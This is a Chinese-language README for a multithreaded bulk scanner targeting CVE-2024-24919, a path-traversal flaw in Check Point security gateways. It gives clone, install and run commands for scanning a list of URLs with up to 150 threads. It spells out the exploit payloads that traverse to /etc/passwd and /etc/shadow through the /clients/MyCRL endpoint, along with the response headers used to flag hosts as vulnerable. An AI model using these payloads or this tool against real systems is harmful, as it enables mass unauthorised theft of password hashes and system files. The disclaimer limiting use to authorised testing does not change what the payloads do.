CVE-2024-24919 [Check Point 安全网关信息泄露]
脚本基于以下内容编写,致谢:https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
此 Python 脚本通过发送特定的 POST 请求并检查响应头和状态码,扫描 URL 列表以发现 CVE-2024-24919 漏洞。它会记录请求和响应详情,并根据预定义的标准识别易受攻击的 URL。

[!WARNING] 仅用于企业环境中的教育和测试。 https://x.com/__nav1n_/ 与 https://github.com/ifconfig-me 不对代码承担任何责任,使用风险自负。 不要攻击未获得授权许可的目标。
[!NOTE] 线程处理:新的 v2 版本现在支持多线程工作。脚本会创建 50 个线程并发处理 URL 以加快扫描速度,该线程数可通过
-t100 进行控制。 队列:使用队列来管理 URL 并将它们分发给工作线程。 进度与结果:脚本使用彩色输出来打印进度和结果。
requests 库termcolor 库克隆仓库:
git clone https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner.git
cd CVE-2024-24919-Bulk-Scanner
安装所需库:
pip install requests termcolor
准备包含 URL 列表的文件:
创建一个文本文件(例如 urls.txt),每行一个 URL。确保每个 URL 以 https:// 开头。示例:
https://example.com
https://testsite.com
https://vulnerable.com
https://123.456.789.10:8080
运行脚本:
python CVE-2024-24919-auto-v2.py -t 150 -f urls.txt
查看输出:
脚本将在终端中打印扫描进度和结果。易受攻击的 URL 将通过 Vulnerable URL found: 消息标识。
结果:
request-analyze.txt 和 request-analyze-v2.txt(v2 版本)。checkpoint-results.txt 和 checkpoint-results-v2.txt(v2 版本)。脚本向每个 URL 的 /clients/MyCRL 端点发送 POST 请求,并携带两个 payload:
aCSHELL/../../../../../../../etc/passwdaCSHELL/../../../../../../../etc/shadow它根据以下条件检查响应头:
Server: Check Point SVN foundationX-UA-Compatible: IE=EmulateIE7X-Frame-Options: SAMEORIGINHTTP/1.0 200 OK如果响应匹配上述三个条件中的任意一个,则该 URL 被视为易受攻击的。
